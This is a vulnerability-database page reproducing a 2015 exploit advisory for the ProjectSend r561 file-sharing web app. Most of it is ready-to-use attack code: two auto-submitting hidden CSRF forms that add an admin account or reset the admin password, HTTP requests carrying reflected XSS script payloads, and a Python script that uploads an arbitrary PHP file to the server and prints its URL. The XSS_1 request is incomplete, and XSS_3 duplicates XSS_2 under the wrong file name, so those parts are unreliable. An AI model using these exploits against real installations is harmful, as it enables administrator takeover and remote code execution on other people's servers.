Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ProjectSend r561 CSRF / XSS / Shell Upload

🗓️ 28 Apr 2015 00:00:00Reported by TUNISIAN CYBERType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

ProjectSend r561 Multiple Vulnerabilities CSRF, XSS, Shell Uploa

Code
`#[+] Author: TUNISIAN CYBER  
#[+] Title: ProjectSend Multiple Vulnerabilities  
#[+] Date: 25-04-2015  
#[+] Vendor: http://www.projectsend.org/  
#[+] Download:http://www.projectsend.org/download/67/  
#[+] Type: WebAPP  
#[+] Tested on: KaliLinux (Debian)  
#[+] Twitter: @TCYB3R  
  
It's a long one so let's start...  
  
I/ CSRF: Add Admin  
  
<html>  
<head>  
<title>ProjectSend CSRF (Add User)</title>  
</head>  
<body>  
<form action="http://192.168.186.129/ProjectSend-r561/users-add.php" method="POST" id="CSRF" style="visibility:hidden">  
<input type="hidden" name="add_user_form_name" value="CSRF OPS" />  
<input type="hidden" name="add_user_form_user" value="TUNISIANCYBER" />  
<input type="hidden" name="add_user_form_pass" value="password" />  
<input type="hidden" name="add_user_form_email" value="[email protected]" />  
<input type="hidden" name="add_user_form_level" value="9" />  
<input type="hidden" name="add_user_form_active" checked="checked" />  
</form>  
<script>  
document.getElementById("CSRF").submit();  
</script>  
</body>  
</html>  
  
0x0Proof:  
http://i.imgur.com/t77Plve.png  
  
II/ CSRF: Change Admin Password:  
<html>  
<head>  
<title>ProjectSend CSRF (Change Password)</title>  
</head>  
<body>  
<form action="http://192.168.186.129/ProjectSend-r561/users-edit.php?id=1" method="POST" id="CSRF" style="visibility:hidden">  
<input type="hidden" name="add_user_form_name" value="User changed" />  
<input type="hidden" name="add_user_form_user" value="admin" />  
<input type="hidden" name="add_user_form_pass" value="password" />  
<input type="hidden" name="add_user_form_email" value="[email protected]" />  
<input type="hidden" name="add_user_form_level" value="9" />  
<input type="hidden" name="add_user_form_active" checked="checked" />  
</form>  
<script>  
document.getElementById("CSRF").submit();  
</script>  
</body>  
</html>  
  
III/ XSS_1 (index.php):  
Host: 192.168.186.129  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 78  
  
0x0Proof:  
http://i.imgur.com/TDfFDU3.png  
  
IV/ XSS_2 (clients.php):  
http://192.168.186.129/ProjectSend-r561/clients.php  
  
POST /ProjectSend-r561/clients.php HTTP/1.1  
Host: 192.168.186.129  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 64  
search=%22%3E%3Cscript%3Ealert%28%220000%22%29%3B%3C%2Fscript%3E  
HTTP/1.1 200 OK  
Date: Sat, 25 Apr 2015 21:15:13 GMT  
Server: Apache/2.2.22 (Debian)  
X-Powered-By: PHP/5.4.39-0+deb7u2  
Expires: Sat, 26 Jul 1997 05:00:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, max-age=0  
Pragma: no-cache  
Vary: Accept-Encoding  
Content-Encoding: gzip  
Content-Length: 2851  
Keep-Alive: timeout=5, max=100  
Connection: Keep-Alive  
Content-Type: text/html  
  
0x0Proof:  
http://i.imgur.com/ywf8JdF.png  
  
V/XSS_3 (actions-log.php)  
http://192.168.186.129/ProjectSend-r561/clients.php  
  
POST /ProjectSend-r561/clients.php HTTP/1.1  
Host: 192.168.186.129  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cookie: adminer_schema-check.php=temptab%3A0x0; username=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; password=%26%BB6%F6%2F%B7%E7%B4%12%13%83%0D%999J%7E%EC%26%02%84%B31%D5d%FB%B9%1F%D9%E3%10%811; name_db=%7F%19%E1%A3%A2%99%AF%C8%EA%86%1E%F0%3D%A3%FA%04; conn[user]=root; conn[pwd]=root; conn[chset]=utf8; PHPSESSID=6i46fls4587ntmn8juo70nl9u7  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 64  
search=%22%3E%3Cscript%3Ealert%28%220000%22%29%3B%3C%2Fscript%3E  
HTTP/1.1 200 OK  
Date: Sat, 25 Apr 2015 21:15:13 GMT  
Server: Apache/2.2.22 (Debian)  
X-Powered-By: PHP/5.4.39-0+deb7u2  
Expires: Sat, 26 Jul 1997 05:00:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, max-age=0  
Pragma: no-cache  
Vary: Accept-Encoding  
Content-Encoding: gzip  
Content-Length: 2851  
Keep-Alive: timeout=5, max=100  
Connection: Keep-Alive  
Content-Type: text/html  
  
0x0Proof:  
http://i.imgur.com/cVKIhj3.png  
  
VI/ File Upload:  
(Exploit oirignally found by Fady Mohamed Osman )  
  
Rewrittend by TUNISIAN CYBER  
  
#!/usr/bin/env python  
import requests  
print"+---------------------------------------+"  
print"| ProjectSend File Upload Vulnerability |"  
print"+---------------------------------------+"  
  
vuln = raw_input('Vulnerable Site:')  
fname = raw_input('EvilFile:')  
with open(fname, 'w') as fout:  
fout.write("<?php phpinfo() ?>")  
url = vuln +'/process-upload.php' +'?name=' + fname  
files = {'file': open(fname, 'rb')}  
result = requests.post(url, files=files)  
print "===>" +vuln+"/upload/files/"+fname  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Apr 2015 00:00Current
0.3Low risk
Vulners AI Score0.3
projectsendmultiple vulnerabilitiescsrfxssshell uploadwebappkalilinuxdebiancsrf add admincsrf change admin passwordxss_1 index.phpxss_2 clients.php
24